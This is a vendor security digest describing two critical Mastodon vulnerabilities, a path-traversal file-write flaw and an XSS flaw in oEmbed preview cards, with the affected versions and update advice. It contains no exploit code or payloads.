In this week’s digest, we discuss two critical vulnerabilities in Mastodon.
Mastodon Security Advisory
Mastodon is a free, open source, and widely-used decentralized social network with microblogging features. It is viewed as an open source and decentralized alternative to Twitter. Mastodon is run via independently managed nodes hosted by different entities on cloud hosting platforms, including Linode.
CVE-2023-36460: Arbitrary File Creation Through Media Attachments
This vulnerability, tracked as CVE-2023-36460 and described under GHSA-9928, allows an attacker to create and overwrite files in any arbitrary location to which the installed Mastodon instance has access.
Vulnerable versions (from version 3.5.0 and prior to versions 3.5.9, 4.0.5, and 4.1.3) use external inputs to construct a path name without properly sanitizing and neutralizing the special elements within the path name. This external input is intended to identify a file or directory below a restricted directory. However, it is not limited or sanitized to only resolve within this specified directory, thus allowing for access and writing outside the restricted directory via directory traversal. Such an exploit can lead to devastating consequences ranging from Denial-of-Service to Remote Code Execution on the Mastodon server.
The vulnerability has a high impact and is rated to have a critical severity, as any user who can post to a Mastodon server can exploit this vulnerability. Additionally, Mastodon is a social media platform, and the number of users who can make posts and run exploits is very high.
CVE-2023-36459: XSS through oEmbed preview cards
This vulnerability, tracked as CVE-2023-36459 and described under GHSA-ccm4, is a Cross-Site Scripting (XSS) vulnerability that allows an attacker to craft a Mastodon oEmbed data to include arbitrary HTML in oEmbed preview cards resulting in various risks associated with a user interacting with a website with untrusted source code.
Vulnerable versions (from version 1.3 and prior to versions 3.5.9, 4.0.5, and 4.1.3) allow an attacker to circumvent the HTML sanitization process using oEmbed data. These versions of Mastodon do not correctly neutralize user-controllable input in oEmbed preview cards before it is placed in output as a part of a web page served to other users. Thus, an attacker-controlled HTML is served to users. This exploit introduces a vector for XSS payloads which, when interacted with by a user, can run untrusted malicious code in the user’s browser and machine.
The vulnerability has a high impact and critical severity, as any user who can create oEmbed data on a mastodon server can exploit this vulnerability. Additionally, all members of an infected server are susceptible to an attack.
- Update your hosted Mastodon instances to versions 4.1.3, 4.0.5, or 3.5.9
- Make sure the Mastodon servers you visit are up to date with the latest version
Note: Mastodon can be hosted on Linodes via manual installation and is also offered as a One Click Marketplace App. However, these instances are not managed or maintained by Linode. It is incumbent upon Linode users to understand the risks and keep the installed software up-to-date. For more information, check out our Mastodon Marketplace App Deployment Guide.
Updated July 14, 2023: Follow our community guide on upgrading Mastodon instances to ensure your Mastodon version is up to date.